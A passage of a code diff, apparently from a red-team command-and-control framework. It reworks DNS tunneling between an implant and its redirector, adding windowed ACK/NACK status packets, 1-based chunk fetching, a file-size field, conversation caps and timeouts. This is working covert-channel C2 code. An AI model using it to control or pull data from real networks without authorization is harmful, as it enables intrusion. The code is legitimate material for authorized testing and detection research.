Err(anyhow::anyhow!( + "Server returned empty response." + )); + } + + // Check if response contains ResponseMetadata (chunked response indicator) if end_response.len() > 2 && end_response != b"ok" { // Try to parse as ResponseMetadata (plain protobuf, not encrypted) if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { @@ -424,8 +673,8 @@ impl DNS { // Fetch all encrypted response chunks and concatenate let mut full_response = Vec::new(); - for chunk_idx in 0..total_chunks { - // Create FetchPayload with chunk index + for chunk_idx in 1..=total_chunks { + // Create FetchPayload with 1-based chunk index let fetch_payload = FetchPayload { chunk_index: chunk_idx as u32, }; @@ -438,6 +687,9 @@ impl DNS { conversation_id: conv_id.clone(), data: fetch_payload_bytes, crc32: 0, + window_size: 0, + acks: vec![], + nacks: vec![], }; // Each chunk is encrypted - get raw chunk data @@ -461,19 +713,7 @@ impl DNS { } // Single response (small enough to fit in one packet) - // Send FETCH packet to get response - let fetch_packet = DnsPacket { - r#type: PacketType::Fetch.into(), - sequence: (total_chunks + 2) as u32, - conversation_id: conv_id.clone(), - data: vec![], - crc32: 0, - }; - - let final_response = self.send_packet(fetch_packet).await?; - - // Return raw response data - Ok(final_response) + Ok(end_response) } } diff --git a/tavern/internal/c2/dnspb/dns.pb.go b/tavern/internal/c2/dnspb/dns.pb.go index 00ad5e99f..9f319ef7a 100644 --- a/tavern/internal/c2/dnspb/dns.pb.go +++ b/tavern/internal/c2/dnspb/dns.pb.go @@ -28,8 +28,8 @@ const ( PacketType_PACKET_TYPE_UNSPECIFIED PacketType = 0 PacketType_PACKET_TYPE_INIT PacketType = 1 // Establish conversation PacketType_PACKET_TYPE_DATA PacketType = 2 // Send data chunk - PacketType_PACKET_TYPE_END PacketType = 3 // Finalize request - PacketType_PACKET_TYPE_FETCH PacketType = 4 // Retrieve response chunk + PacketType_PACKET_TYPE_FETCH PacketType = 3 // Retrieve response chunk + PacketType_PACKET_TYPE_STATUS PacketType = 4 // Server status response with ACKs/NACKs ) // Enum value maps for PacketType. @@ -38,15 +38,15 @@ var ( 0: "PACKET_TYPE_UNSPECIFIED", 1: "PACKET_TYPE_INIT", 2: "PACKET_TYPE_DATA", - 3: "PACKET_TYPE_END", - 4: "PACKET_TYPE_FETCH", + 3: "PACKET_TYPE_FETCH", + 4: "PACKET_TYPE_STATUS", } PacketType_value = map[string]int32{ "PACKET_TYPE_UNSPECIFIED": 0, "PACKET_TYPE_INIT": 1, "PACKET_TYPE_DATA": 2, - "PACKET_TYPE_END": 3, - "PACKET_TYPE_FETCH": 4, + "PACKET_TYPE_FETCH": 3, + "PACKET_TYPE_STATUS": 4, } ) @@ -86,8 +86,12 @@ type DNSPacket struct { ConversationId string `protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 12-character random conversation ID Data []byte `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` // Chunk payload (or InitPayload for INIT packets) Crc32 uint32 `protobuf:"varint,5,opt,name=crc32,proto3" json:"crc32,omitempty"` // Optional CRC32 for validation - unknownFields protoimpl.UnknownFields - sizeCache protoimpl.SizeCache + // Async protocol fields for windowed transmission + WindowSize uint32 `protobuf:"varint,6,opt,name=window_size,json=windowSize,proto3" json:"window_size,omitempty"` // Number of packets client has in-flight + Acks []*AckRange `protobuf:"bytes,7,rep,name=acks,proto3" json:"acks,omitempty"` // Ranges of successfully received chunks (SACK) + Nacks []uint32 `protobuf:"varint,8,rep,packed,name=nacks,proto3" json:"nacks,omitempty"` // Specific sequence numbers to retransmit + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache } func (x *DNSPacket) Reset() { @@ -155,6 +159,80 @@ func (x *DNSPacket) GetCrc32() uint32 { return 0 } +func (x *DNSPacket) GetWindowSize() uint32 { + if x != nil { + return x.WindowSize + } + return 0 +} + +func (x *DNSPacket) GetAcks() []*AckRange { + if x != nil { + return x.Acks + } + return nil +} + +func (x *DNSPacket) GetNacks() []uint32 { + if x != nil { + return x.Nacks + } + return nil +} + +// AckRange represents a contiguous range of acknowledged sequence numbers +type AckRange struct { + state protoimpl.MessageState `protogen:"open.v1"` + StartSeq uint32 `protobuf:"varint,1,opt,name=start_seq,json=startSeq,proto3" json:"start_seq,omitempty"` // Inclusive start of range + EndSeq uint32 `protobuf:"varint,2,opt,name=end_seq,json=endSeq,proto3" json:"end_seq,omitempty"` // Inclusive end of range + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *AckRange) Reset() { + *x = AckRange{} + mi := &file_dns_proto_msgTypes[1] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *AckRange) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*AckRange) ProtoMessage() {} + +func (x *AckRange) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[1] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use AckRange.ProtoReflect.Descriptor instead. +func (*AckRange) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{1} +} + +func (x *AckRange) GetStartSeq() uint32 { + if x != nil { + return x.StartSeq + } + return 0 +} + +func (x *AckRange) GetEndSeq() uint32 { + if x != nil { + return x.EndSeq + } + return 0 +} + // InitPayload is the payload for INIT packets // It contains metadata about the upcoming data transmission type InitPayload struct { @@ -162,13 +240,14 @@ type InitPayload struct { MethodCode string `protobuf:"bytes,1,opt,name=method_code,json=methodCode,proto3" json:"method_code,omitempty"` // 2-character gRPC method code (e.g., "ct", "fa") TotalChunks uint32 `protobuf:"varint,2,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of data chunks to expect DataCrc32 uint32 `protobuf:"varint,3,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete request data + FileSize uint32 `protobuf:"varint,4,opt,name=file_size,json=fileSize,proto3" json:"file_size,omitempty"` // Total size of the file/data in bytes unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } func (x *InitPayload) Reset() { *x = InitPayload{} - mi := &file_dns_proto_msgTypes[1] + mi := &file_dns_proto_msgTypes[2] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -180,7 +259,7 @@ func (x *InitPayload) String() string { func (*InitPayload) ProtoMessage() {} func (x *InitPayload) ProtoReflect() protoreflect.Message { - mi := &file_dns_proto_msgTypes[1] + mi := &file_dns_proto_msgTypes[2] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -193,7 +272,7 @@ func (x *InitPayload) ProtoReflect() protoreflect.Message { // Deprecated: Use InitPayload.ProtoReflect.Descriptor instead. func (*InitPayload) Descriptor() ([]byte, []int) { - return file_dns_proto_rawDescGZIP(), []int{1} + return file_dns_proto_rawDescGZIP(), []int{2} } func (x *InitPayload) GetMethodCode() string { @@ -217,6 +296,13 @@ func (x *InitPayload) GetDataCrc32() uint32 { return 0 } +func (x *InitPayload) GetFileSize() uint32 { + if x != nil { + return x.FileSize + } + return 0 +} + // FetchPayload is the payload for FETCH packets // It specifies which response chunk to retrieve type FetchPayload struct { @@ -228,7 +314,7 @@ type FetchPayload struct { func (x *FetchPayload) Reset() { *x = FetchPayload{} - mi := &file_dns_proto_msgTypes[2] + mi := &file_dns_proto_msgTypes[3] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -240,7 +326,7 @@ func (x *FetchPayload) String() string { func (*FetchPayload) ProtoMessage() {} func (x *FetchPayload) ProtoReflect() protoreflect.Message { - mi := &file_dns_proto_msgTypes[2] + mi := &file_dns_proto_msgTypes[3] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -253,7 +339,7 @@ func (x *FetchPayload) ProtoReflect() protoreflect.Message { // Deprecated: Use FetchPayload.ProtoReflect.Descriptor instead. func (*FetchPayload) Descriptor() ([]byte, []int) { - return file_dns_proto_rawDescGZIP(), []int{2} + return file_dns_proto_rawDescGZIP(), []int{3} } func (x *FetchPayload) GetChunkIndex() uint32 { @@ -275,7 +361,7 @@ type ResponseMetadata struct { func (x *ResponseMetadata) Reset() { *x = ResponseMetadata{} - mi := &file_dns_proto_msgTypes[3] + mi := &file_dns_proto_msgTypes[4] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -287,7 +373,7 @@ func (x *ResponseMetadata) String() string { func (*ResponseMetadata) ProtoMessage() {} func (x *ResponseMetadata) ProtoReflect() protoreflect.Message { - mi := &file_dns_proto_msgTypes[3] + mi := &file_dns_proto_msgTypes[4] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -300,7 +386,7 @@ func (x *ResponseMetadata) ProtoReflect() protoreflect.Message { // Deprecated: Use ResponseMetadata.ProtoReflect.Descriptor instead. func (*ResponseMetadata) Descriptor() ([]byte, []int) { - return file_dns_proto_rawDescGZIP(), []int{3} + return file_dns_proto_rawDescGZIP(), []int{4} } func (x *ResponseMetadata) GetTotalChunks() uint32 { @@ -328,19 +414,27 @@ var File_dns_proto protoreflect.FileDescriptor const file_dns_proto_rawDesc = "" + "\n" + - "\tdns.proto\x12\x03dns\"\x9f\x01\n" + + "\tdns.proto\x12\x03dns\"\xf9\x01\n" + "\tDNSPacket\x12#\n" + "\x04type\x18\x01 \x01(\x0e2\x0f.dns.PacketTypeR\x04type\x12\x1a\n" + "\bsequence\x18\x02 \x01(\rR\bsequence\x12'\n" + "\x0fconversation_id\x18\x03 \x01(\tR\x0econversationId\x12\x12\n" + "\x04data\x18\x04 \x01(\fR\x04data\x12\x14\n" + - "\x05crc32\x18\x05 \x01(\rR\x05crc32\"p\n" + + "\x05crc32\x18\x05 \x01(\rR\x05crc32\x12\x1f\n" + + "\vwindow_size\x18\x06 \x01(\rR\n" + + "windowSize\x12!\n" + + "\x04acks\x18\a \x03(\v2\r.dns.AckRangeR\x04acks\x12\x14\n" + + "\x05nacks\x18\b \x03(\rR\x05nacks\"@\n" + + "\bAckRange\x12\x1b\n" + + "\tstart_seq\x18\x01 \x01(\rR\bstartSeq\x12\x17\n" + + "\aend_seq\x18\x02 \x01(\rR\x06endSeq\"\x8d\x01\n" + "\vInitPayload\x12\x1f\n" + "\vmethod_code\x18\x01 \x01(\tR\n" + "methodCode\x12!\n" + "\ftotal_chunks\x18\x02 \x01(\rR\vtotalChunks\x12\x1d\n" + "\n" + - "data_crc32\x18\x03 \x01(\rR\tdataCrc32\"/\n" + + "data_crc32\x18\x03 \x01(\rR\tdataCrc32\x12\x1b\n" + + "\tfile_size\x18\x04 \x01(\rR\bfileSize\"/\n" + "\fFetchPayload\x12\x1f\n" + "\vchunk_index\x18\x01 \x01(\rR\n" + "chunkIndex\"s\n" + @@ -349,14 +443,14 @@ const file_dns_proto_rawDesc = "" + "\n" + "data_crc32\x18\x02 \x01(\rR\tdataCrc32\x12\x1d\n" + "\n" + - "chunk_size\x18\x03 \x01(\rR\tchunkSize*\x81\x01\n" + + "chunk_size\x18\x03 \x01(\rR\tchunkSize*\x84\x01\n" + "\n" + "PacketType\x12\x1b\n" + "\x17PACKET_TYPE_UNSPECIFIED\x10\x00\x12\x14\n" + "\x10PACKET_TYPE_INIT\x10\x01\x12\x14\n" + - "\x10PACKET_TYPE_DATA\x10\x02\x12\x13\n" + - "\x0fPACKET_TYPE_END\x10\x03\x12\x15\n" + - "\x11PACKET_TYPE_FETCH\x10\x04B$Z\"realm.pub/tavern/internal/c2/dnspbb\x06proto3" + "\x10PACKET_TYPE_DATA\x10\x02\x12\x15\n" + + "\x11PACKET_TYPE_FETCH\x10\x03\x12\x16\n" + + "\x12PACKET_TYPE_STATUS\x10\x04B$Z\"realm.pub/tavern/internal/c2/dnspbb\x06proto3" var ( file_dns_proto_rawDescOnce sync.Once @@ -371,21 +465,23 @@ func file_dns_proto_rawDescGZIP() []byte { } var file_dns_proto_enumTypes = make([]protoimpl.EnumInfo, 1) -var file_dns_proto_msgTypes = make([]protoimpl.MessageInfo, 4) +var file_dns_proto_msgTypes = make([]protoimpl.MessageInfo, 5) var file_dns_proto_goTypes = []any{ (PacketType)(0), // 0: dns.PacketType (*DNSPacket)(nil), // 1: dns.DNSPacket - (*InitPayload)(nil), // 2: dns.InitPayload - (*FetchPayload)(nil), // 3: dns.FetchPayload - (*ResponseMetadata)(nil), // 4: dns.ResponseMetadata + (*AckRange)(nil), // 2: dns.AckRange + (*InitPayload)(nil), // 3: dns.InitPayload + (*FetchPayload)(nil), // 4: dns.FetchPayload + (*ResponseMetadata)(nil), // 5: dns.ResponseMetadata } var file_dns_proto_depIdxs = []int32{ 0, // 0: dns.DNSPacket.type:type_name -> dns.PacketType - 1, // [1:1] is the sub-list for method output_type - 1, // [1:1] is the sub-list for method input_type - 1, // [1:1] is the sub-list for extension type_name - 1, // [1:1] is the sub-list for extension extendee - 0, // [0:1] is the sub-list for field type_name + 2, // 1: dns.DNSPacket.acks:type_name -> dns.AckRange + 2, // [2:2] is the sub-list for method output_type + 2, // [2:2] is the sub-list for method input_type + 2, // [2:2] is the sub-list for extension type_name + 2, // [2:2] is the sub-list for extension extendee + 0, // [0:2] is the sub-list for field type_name } func init() { file_dns_proto_init() } @@ -399,7 +495,7 @@ func file_dns_proto_init() { GoPackagePath: reflect.TypeOf(x{}).PkgPath(), RawDescriptor: unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc)), NumEnums: 1, - NumMessages: 4, + NumMessages: 5, NumExtensions: 0, NumServices: 0, }, diff --git a/tavern/internal/c2/proto/dns.proto b/tavern/internal/c2/proto/dns.proto index 1c9d4d2d9..6fc76d8aa 100644 --- a/tavern/internal/c2/proto/dns.proto +++ b/tavern/internal/c2/proto/dns.proto @@ -9,8 +9,8 @@ enum PacketType { PACKET_TYPE_UNSPECIFIED = 0; PACKET_TYPE_INIT = 1; // Establish conversation PACKET_TYPE_DATA = 2; // Send data chunk - PACKET_TYPE_END = 3; // Finalize request - PACKET_TYPE_FETCH = 4; // Retrieve response chunk + PACKET_TYPE_FETCH = 3; // Retrieve response chunk + PACKET_TYPE_STATUS = 4; // Server status response with ACKs/NACKs } // DNSPacket is the main message format for DNS C2 communication @@ -21,6 +21,17 @@ message DNSPacket { string conversation_id = 3; // 12-character random conversation ID bytes data = 4; // Chunk payload (or InitPayload for INIT packets) uint32 crc32 = 5; // Optional CRC32 for validation + + // Async protocol fields for windowed transmission + uint32 window_size = 6; // Number of packets client has in-flight + repeated AckRange acks = 7; // Ranges of successfully received chunks (SACK) + repeated uint32 nacks = 8; // Specific sequence numbers to retransmit +} + +// AckRange represents a contiguous range of acknowledged sequence numbers +message AckRange { + uint32 start_seq = 1; // Inclusive start of range + uint32 end_seq = 2; // Inclusive end of range } // InitPayload is the payload for INIT packets @@ -29,6 +40,7 @@ message InitPayload { string method_code = 1; // 2-character gRPC method code (e.g., "ct", "fa") uint32 total_chunks = 2; // Total number of data chunks to expect uint32 data_crc32 = 3; // CRC32 checksum of complete request data + uint32 file_size = 4; // Total size of the file/data in bytes } // FetchPayload is the payload for FETCH packets diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index ecd60ac07..7ea2b20e3 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -4,13 +4,17 @@ import ( "context" "encoding/base32" "encoding/binary" + "errors" "fmt" "hash/crc32" + "io" "log/slog" "net" "net/url" + "sort" "strings" "sync" + "sync/atomic" "time" "google.golang.org/grpc" @@ -39,6 +43,15 @@ const ( dnsPointer = 0xC00C txtMaxChunkSize = 255 + + // Async protocol configuration + MaxActiveConversations = 10000 + NormalConversationTimeout = 15 * time.Minute + ReducedConversationTimeout = 5 * time.Minute + CapacityRecoveryThreshold = 0.5 // 50% + MaxAckRangesInResponse = 20 + MaxNacksInResponse = 50 + MaxDataSize = 50 * 1024 * 1024 // 50MB max data size ) func init() { @@ -47,23 +60,26 @@ func init() { // Redirector handles DNS-based C2 communication type Redirector struct { - conversations sync.Map - baseDomains []string + conversations sync.Map + baseDomains []string + conversationCount int32 // Atomic counter for active conversations + conversationTimeout time.Duration } // Conversation tracks state for a request-response exchange type Conversation struct { - mu sync.Mutex - ID string - MethodPath string - TotalChunks uint32 - ExpectedCRC uint32 - Chunks map[uint32][]byte - LastActivity time.Time - ResponseData []byte - ResponseChunks [][]byte // Split response for multi-fetch - ResponseCRC uint32 - MaxResponseSize int // Max size per DNS response packet + mu sync.Mutex + ID string + MethodPath string + TotalChunks uint32 + ExpectedCRC uint32 + ExpectedDataSize uint32 // Data size provided by client + Chunks map[uint32][]byte + LastActivity time.Time + ResponseData []byte + ResponseChunks [][]byte // Split response for multi-fetch + ResponseCRC uint32 + Completed bool // Set to true when all chunks received } func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *grpc.ClientConn) error { @@ -77,6 +93,7 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr } r.baseDomains = domains + r.conversationTimeout = NormalConversationTimeout udpAddr, err := net.ResolveUDPAddr("udp", listenAddr) if err != nil { @@ -162,11 +179,21 @@ func (r *Redirector) cleanupConversations(ctx context.Context) { return case <-ticker.C: now := time.Now() + count := atomic.LoadInt32(&r.conversationCount) + + // Adjust timeout based on capacity + if count >= MaxActiveConversations { + r.conversationTimeout = ReducedConversationTimeout + } else if float64(count) < float64(MaxActiveConversations)*CapacityRecoveryThreshold { + r.conversationTimeout = NormalConversationTimeout + } + r.conversations.Range(func(key, value interface{}) bool { conv := value.(*Conversation) conv.mu.Lock() - if now.Sub(conv.LastActivity) > convTimeout { + if now.Sub(conv.LastActivity) > r.conversationTimeout { r.conversations.Delete(key) + atomic.AddInt32(&r.conversationCount, -1) } conv.mu.Unlock() return true @@ -216,9 +243,7 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr case dnspb.PacketType_PACKET_TYPE_INIT: responseData, err = r.handleInitPacket(packet) case dnspb.PacketType_PACKET_TYPE_DATA: - responseData, err = r.handleDataPacket(packet) - case dnspb.PacketType_PACKET_TYPE_END: - responseData, err = r.handleEndPacket(ctx, upstream, packet, queryType) + responseData, err = r.handleDataPacket(ctx, upstream, packet, queryType) case dnspb.PacketType_PACKET_TYPE_FETCH: responseData, err = r.handleFetchPacket(packet) default: @@ -295,20 +320,53 @@ func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { // handleInitPacket processes INIT packet func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { + // Atomically check and increment conversation count + // Loop until we successfully increment or hit the limit + for { + current := atomic.LoadInt32(&r.conversationCount) + if current >= MaxActiveConversations { + return nil, fmt.Errorf("max active conversations reached: %d", current) + } + // Try to increment atomically + if atomic.CompareAndSwapInt32(&r.conversationCount, current, current+1) { + // Successfully incremented, break out + break + } + // CAS failed (another goroutine modified the value), retry + } + // Unmarshal init payload var initPayload dnspb.InitPayload if err := proto.Unmarshal(packet.Data, &initPayload); err != nil { + // Decrement on error since we already incremented + atomic.AddInt32(&r.conversationCount, -1) return nil, fmt.Errorf("failed to unmarshal init payload: %w", err) } + // Validate file size from client + if initPayload.FileSize > MaxDataSize { + atomic.AddInt32(&r.conversationCount, -1) + return nil, fmt.Errorf("data size exceeds maximum: %d > %d bytes", initPayload.FileSize, MaxDataSize) + } + + // Validate that FileSize is set (protobuf default is 0) + if initPayload.FileSize == 0 && initPayload.TotalChunks > 0 { + slog.Warn("INIT packet missing file_size field", "conv_id", packet.ConversationId, "total_chunks", initPayload.TotalChunks) + } + + slog.Debug("creating conversation", "conv_id", packet.ConversationId, "method", initPayload.MethodCode, + "total_chunks", initPayload.TotalChunks, "file_size", initPayload.FileSize, "crc32", initPayload.DataCrc32) + // Create conversation conv := &Conversation{ - ID: packet.ConversationId, - MethodPath: initPayload.MethodCode, - TotalChunks: initPayload.TotalChunks, - ExpectedCRC: initPayload.DataCrc32, - Chunks: make(map[uint32][]byte), - LastActivity: time.Now(), + ID: packet.ConversationId, + MethodPath: initPayload.MethodCode, + TotalChunks: initPayload.TotalChunks, + ExpectedCRC: initPayload.DataCrc32, + ExpectedDataSize: initPayload.FileSize, + Chunks: make(map[uint32][]byte), + LastActivity: time.Now(), + Completed: false, } r.conversations.Store(packet.ConversationId, conv) @@ -319,7 +377,7 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { } // handleDataPacket processes DATA packet -func (r *Redirector) handleDataPacket(packet *dnspb.DNSPacket) ([]byte, error) { +func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) if !ok { return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) @@ -329,37 +387,60 @@ func (r *Redirector) handleDataPacket(packet *dnspb.DNSPacket) ([]byte, error) { conv.mu.Lock() defer conv.mu.Unlock() - // Store chunk (sequence is 1-indexed) + // Validate sequence number + if packet.Sequence < 1 || packet.Sequence > conv.TotalChunks { + return nil, fmt.Errorf("sequence out of bounds: %d (expected 1-%d)", packet.Sequence, conv.TotalChunks) + } + + // Store chunk (sequence is 1-indexed, overwrites duplicates safely) conv.Chunks[packet.Sequence] = packet.Data conv.LastActivity = time.Now() slog.Debug("received chunk", "conv_id", conv.ID, "seq", packet.Sequence, "size", len(packet.Data), "total", len(conv.Chunks)) - return []byte("ok"), nil -} + // Check if conversation is complete and auto-process + if uint32(len(conv.Chunks)) == conv.TotalChunks && !conv.Completed { + conv.Completed = true + slog.Debug("conversation complete, processing request", "conv_id", conv.ID, "total_chunks", conv.TotalChunks) -// handleEndPacket processes END packet and forwards to upstream -func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { - val, ok := r.conversations.Load(packet.ConversationId) - if !ok { - return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) + // Unlock before calling processCompletedConversation (it will re-lock) + conv.mu.Unlock() + if err := r.processCompletedConversation(ctx, upstream, conv, queryType); err != nil { + slog.Error("failed to process completed conversation", "conv_id", conv.ID, "error", err) + } + conv.mu.Lock() } - conv := val.(*Conversation) - conv.mu.Lock() - defer conv.mu.Unlock() + // Build ACK/NACK response (STATUS packet) + acks, nacks := r.computeAcksNacks(conv) - // Check if all chunks received - if uint32(len(conv.Chunks)) != conv.TotalChunks { - return nil, fmt.Errorf("missing chunks: received %d, expected %d", len(conv.Chunks), conv.TotalChunks) + statusPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_STATUS, + ConversationId: packet.ConversationId, + Acks: acks, + Nacks: nacks, } + // Marshal STATUS packet to return as response + statusData, err := proto.Marshal(statusPacket) + if err != nil { + return nil, fmt.Errorf("failed to marshal status packet: %w", err) + } + + return statusData, nil +} + +// processCompletedConversation reassembles data, verifies CRC, forwards to upstream, and stores response +func (r *Redirector) processCompletedConversation(ctx context.Context, upstream *grpc.ClientConn, conv *Conversation, queryType uint16) error { + conv.mu.Lock() + defer conv.mu.Unlock() + // Reassemble data (chunks are 1-indexed) var fullData []byte for i := uint32(1); i <= conv.TotalChunks; i++ { chunk, ok := conv.Chunks[i] if !ok { - return nil, fmt.Errorf("missing chunk %d", i) + return fmt.Errorf("missing chunk %d", i) } fullData = append(fullData, chunk...) } @@ -367,28 +448,40 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC // Verify CRC actualCRC := crc32.ChecksumIEEE(fullData) if actualCRC != conv.ExpectedCRC { - return nil, fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) + // Clean up on fatal error + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) } slog.Debug("reassembled data", "conv_id", conv.ID, "size", len(fullData), "method", conv.MethodPath) + // Validate reassembled size matches client-provided data size (if provided) + if conv.ExpectedDataSize > 0 && uint32(len(fullData)) != conv.ExpectedDataSize { + // Clean up on fatal error + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("reassembled data size mismatch: expected %d bytes, got %d bytes", conv.ExpectedDataSize, len(fullData)) + } + // Forward to upstream gRPC server responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, fullData) if err != nil { - return nil, fmt.Errorf("failed to forward to upstream: %w", err) + // Clean up on fatal error + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("failed to forward to upstream: %w", err) } - // Determine max response size based on record type to fit in UDP packet - // For A/AAAA records with multiple records, we need much smaller chunks - // to avoid creating packets with 100+ DNS records + // Determine max response size based on record type var maxSize int switch queryType { case txtRecordType: - maxSize = 400 // TXT can handle larger chunks in single record + maxSize = 400 case aRecordType: - maxSize = 64 // A records: 64 bytes = 16 A records (16 * 4 bytes) + maxSize = 64 case aaaaRecordType: - maxSize = 128 // AAAA records: 128 bytes = 8 AAAA records (8 * 16 bytes) + maxSize = 128 default: maxSize = 400 } @@ -413,29 +506,78 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC slog.Debug("response chunked", "conv_id", conv.ID, "total_size", len(responseData), "chunks", len(conv.ResponseChunks), "crc32", conv.ResponseCRC) + } else { + // Response fits in single packet + conv.ResponseData = responseData + conv.LastActivity = time.Now() - // Return metadata about chunked response - metadata := &dnspb.ResponseMetadata{ - TotalChunks: uint32(len(conv.ResponseChunks)), - DataCrc32: conv.ResponseCRC, - ChunkSize: uint32(maxSize), - } - metadataBytes, err := proto.Marshal(metadata) - if err != nil { - return nil, fmt.Errorf("failed to marshal metadata: %w", err) + slog.Debug("stored response", "conv_id", conv.ID, "size", len(responseData)) + } + + return nil +} + +// computeAcksNacks computes ACK ranges and NACK list for a conversation +// Must be called with conv.mu locked +func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, []uint32) { + // Build sorted list of received sequences + received := make([]uint32, 0, len(conv.Chunks)) + for seq := range conv.Chunks { + received = append(received, seq) + } + sort.Slice(received, func(i, j int) bool { return received[i] < received[j] }) + + // Compute ACK ranges (contiguous blocks) + acks := []*dnspb.AckRange{} + if len(received) > 0 { + start := received[0] + end := received[0] + + for i := 1; i < len(received); i++ { + if received[i] == end+1 { + end = received[i] + } else { + acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) + start = received[i] + end = received[i] + } } - return metadataBytes, nil + acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) } - // Response fits in single packet - conv.ResponseData = responseData - conv.LastActivity = time.Now() + // Limit ACK ranges + if len(acks) > MaxAckRangesInResponse { + acks = acks[:MaxAckRangesInResponse] + } - slog.Debug("stored response", "conv_id", conv.ID, "size", len(responseData)) + // Compute NACKs (missing sequences in gaps) + nacks := []uint32{} - return []byte("ok"), nil + if len(received) > 0 { + // Find gaps between first and last received + minReceived := received[0] + maxReceived := received[len(received)-1] + + receivedSet := make(map[uint32]bool) + for _, seq := range received { + receivedSet[seq] = true + } + + for seq := minReceived; seq <= maxReceived; seq++ { + if !receivedSet[seq] { + nacks = append(nacks, seq) + if len(nacks) >= MaxNacksInResponse { + break + } + } + } + } + + return acks, nacks } + + // handleFetchPacket processes FETCH packet func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) @@ -455,34 +597,47 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) // Check if response was chunked if len(conv.ResponseChunks) > 0 { - // Parse fetch payload to get chunk index - var fetchPayload dnspb.FetchPayload - if len(packet.Data) > 0 { - if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { - return nil, fmt.Errorf("failed to unmarshal fetch payload: %w", err) + // Empty data = metadata request + // Non-empty data = FetchPayload with 1-based chunk_index + if len(packet.Data) == 0 { + // Return ResponseMetadata + metadata := &dnspb.ResponseMetadata{ + TotalChunks: uint32(len(conv.ResponseChunks)), + DataCrc32: conv.ResponseCRC, + ChunkSize: uint32(len(conv.ResponseChunks[0])), } + metadataBytes, err := proto.Marshal(metadata) + if err != nil { + return nil, fmt.Errorf("failed to marshal metadata: %w", err) + } + + slog.Debug("returning response metadata", "conv_id", conv.ID, "total_chunks", len(conv.ResponseChunks), + "total_size", len(conv.ResponseData), "crc32", conv.ResponseCRC) + + return metadataBytes, nil + } + + // Parse FetchPayload - chunk_index is 1-based + var fetchPayload dnspb.FetchPayload + if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { + return nil, fmt.Errorf("failed to unmarshal fetch payload: %w", err) } - chunkIndex := int(fetchPayload.ChunkIndex) + // Convert 1-based to 0-based array index + chunkIndex := int(fetchPayload.ChunkIndex) - 1 if chunkIndex < 0 || chunkIndex >= len(conv.ResponseChunks) { - return nil, fmt.Errorf("invalid chunk index: %d (total: %d)", chunkIndex, len(conv.ResponseChunks)) + return nil, fmt.Errorf("invalid chunk index: %d (expected 1-%d)", fetchPayload.ChunkIndex, len(conv.ResponseChunks)) } - slog.Debug("returning response chunk", "conv_id", conv.ID, "chunk", chunkIndex, + slog.Debug("returning 